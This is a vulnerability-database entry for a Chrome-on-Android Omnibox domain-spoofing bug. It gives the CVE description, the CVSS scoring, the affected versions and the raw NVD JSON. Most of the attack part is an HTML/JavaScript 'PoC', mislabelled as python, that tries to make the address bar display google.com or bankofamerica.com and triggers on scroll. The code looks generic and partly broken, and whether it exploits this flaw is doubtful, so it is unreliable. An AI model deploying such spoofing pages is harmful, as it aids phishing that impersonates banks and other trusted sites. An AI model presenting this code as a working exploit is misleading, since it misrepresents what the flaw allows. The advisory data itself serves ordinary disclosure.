Security Vulnerability Report
中文
CVE-2025-11213 CVSS 6.3 MEDIUM

CVE-2025-11213

Published: 2025-11-06 22:15:39
Last Modified: 2025-11-13 15:29:21

Description

Inappropriate implementation in Omnibox in Google Chrome on Android prior to 141.0.7390.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium)

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome Android < 141.0.7390.54

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-11213 PoC - Omnibox Domain Spoofing --> <!DOCTYPE html> <html> <head> <title>CVE-2025-11213 Domain Spoofing PoC</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .spoofed-domain { color: green; font-weight: bold; } #exploit-area { height: 2000px; background: linear-gradient(transparent, #f0f0f0); } </style> </head> <body> <h1>Omnibox Domain Spoofing Test</h1> <p>Current URL: <span id="current-url"></span></p> <p>Displayed Domain: <span id="displayed-domain" class="spoofed-domain">Loading...</span></p> <div id="exploit-area"> <p>Scroll down to trigger exploit...</p> <button onclick="triggerSpoof()">Manual Trigger</button> </div> <script> // Exploit technique for CVE-2025-11213 function triggerSpoof() { // Technique 1: History navigation abuse history.pushState(null, '', 'https://www.google.com'); // Technique 2: Rapid navigation with overlay setTimeout(() => { const overlay = document.createElement('div'); overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;'; overlay.innerHTML = '<iframe src="about:blank" style="width:100%;height:100%"></iframe>'; document.body.appendChild(overlay); }, 100); // Technique 3: Scroll gesture manipulation window.scrollTo(0, document.body.scrollHeight); // Technique 4: Address bar race condition setTimeout(() => { window.location.href = 'data:text/html,<script>history.pushState(null,"","https://www.bankofamerica.com");</script>'; }, 200); } // Monitor address bar state setInterval(() => { document.getElementById('current-url').textContent = window.location.href; document.getElementById('displayed-domain').textContent = window.location.hostname; }, 500); // Auto-trigger on scroll (UI gesture requirement) window.addEventListener('scroll', () => { if (window.scrollY > 500) { triggerSpoof(); } }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11213", "sourceIdentifier": "[email protected]", "published": "2025-11-06T22:15:39.317", "lastModified": "2025-11-13T15:29:21.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Omnibox in Google Chrome on Android prior to 141.0.7390.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "141.0.7390.54", "matchCriteriaId": "008031A0-CC1E-47CF-A136-90F4FE1FA9A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_30.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/443408317", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}